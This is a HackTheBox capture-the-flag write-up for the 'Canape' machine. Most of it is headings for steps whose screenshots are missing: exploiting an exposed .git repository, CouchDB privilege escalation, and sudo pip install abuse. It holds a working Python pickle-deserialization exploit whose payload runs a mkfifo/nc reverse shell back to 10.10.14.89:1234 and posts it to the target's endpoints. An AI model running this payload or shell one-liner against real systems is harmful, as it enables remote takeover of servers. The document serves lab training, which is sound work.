HackTheBox Writeup — Canape

NMAP Results

/.git

http://10.10.10.70/.git
http://10.10.10.70/.git/config
Editing /etc/hosts
git clone (simpsons.git)
cat __init__.py

Pickle Injection Vulnerability

import os
import cPickle
from hashlib import md5
import requests

# Exploit that we want the target to unpickle

class Exploit(object):
def __reduce__(self):
return (os.system, (‘homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f’,))

shellcode = cPickle.dumps(Exploit())
print shellcode + “\n”
print md5(shellcode).hexdigest()

part1 = str(shellcode.split(“;”)[0])
part2 = str(“;”+shellcode.split(“;”)[1])
part3 = str(“;”+shellcode.split(“;”)[2])
part4 = str(“;”+shellcode.split(“;”)[3])

r = requests.post(“http://10.10.10.70/submit", data={‘character’: str(part1), ‘quote’:str(part2 + part3 + part4)})

print(r.status_code, r.reason, r.text)

r2 = requests.post(“http://10.10.10.70/check", data={‘id’: md5(shellcode).hexdigest()})

print(r2.status_code, r2.reason, r2.text)

Reverse Connection Through Python Pickle Injection
Getting tty

CouchDB Privelege Escalation

ps aux | grep homer
Creating our own user on the database
Confirming the user created
Dumping the usernames and passwords
su homer
NMAP Full Port Scan

SSH Connection

SSH Connection Successful
sudo -l
Python Script To Exploit /usr/bin/pip install * as sudo
Command + Listener
Exploit Successful

Getting User Flag

user.txt

Getting Root Flag

root.txt

Vulnerabilities Used To Exploit This Box

References

Python Pickle Injection :

CouchDB Exploitation :

Sudo (/usr/bin/pip install *) Exploitation :

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Faisal Husaini

Faisal Husaini

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover